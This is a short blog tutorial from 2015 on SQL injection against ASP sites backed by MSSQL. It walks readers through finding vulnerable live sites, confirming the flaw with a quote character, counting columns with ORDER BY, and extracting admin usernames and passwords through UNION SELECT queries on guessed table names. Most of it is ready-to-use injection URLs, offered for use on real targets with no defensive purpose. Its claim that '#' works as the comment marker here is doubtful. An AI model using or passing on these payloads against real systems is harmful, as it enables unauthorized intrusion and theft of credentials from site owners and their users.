Saturday, April 4, 2015

MSSQL [asp] Sql injection

The sql injection on asp is same as on php...but a little bit of changes are made...

So first of all we will find some site that is Vulnerable and is on .asp

So assume that u got a site with the name of


Code:
http://www.target.com/


now find page where the site is vul to sql injection...

You can check the Vulnerability by adding single quotation '
at the end of URL like

Code:
http://www.target.com/product.asp?id=13'


If u get this error...

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.
/deptdet.asp, line 122
Then this means the site is vul to sql injections...Now we are going to find the columns in it...Normally we use -- at the end of string but in this case we will be using #

Code:
http://www.target.com/product.asp?id=13 order by 1#

Suppose that the site has 10 columns...when you will use the query "order by 1#" (without double quotations)
You will not get any error...the page will load normally...but when you will use the query "order by 11#" (without double quotations) you will get an error this means that the site has 10 columns...

So we will have an error on this query

Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we will use this query, we will not get any error.

Code:
http://www.target.com/product.asp?id=13 order by 10#

This tells us that the table has 10 columns.

Now we will write the query as...

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#


So now in next step we need name of a table to get number of largets visible column from all .. let me explain bit , like in simple sql injection we use union select 1,2,3,4,5,6 -- and we get a number to get information from site , in this we need a table name to get that number of visible column ,

so to get that number we are going to add name of table after union select 1,2,3,4,5,6,7, ..,10

in this scripts of getting table names dont work most times i tried some of them so we will add name of tables manually normally name of tables are " admin,tbladmin,tbl_admin,user,users,login,info,email" etc . Suppose in the site we got admin table that is visible. Now our url will look like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#


After this we will get number of largest visible column which we can use to get data from site. Suppose we got 3,7and 6 columns that are visible...

So now we are going to use 3 to get information now all we have to do is just put the name of column instead of 3 in string and we will get username and password ,

Now our URL will look like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
Suppose we got a username instead of the number 3.

and then change column name with passwords column name
you will get the password ;)
URL will be like

Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#

Author : LAFANGA

No comments:

Post a Comment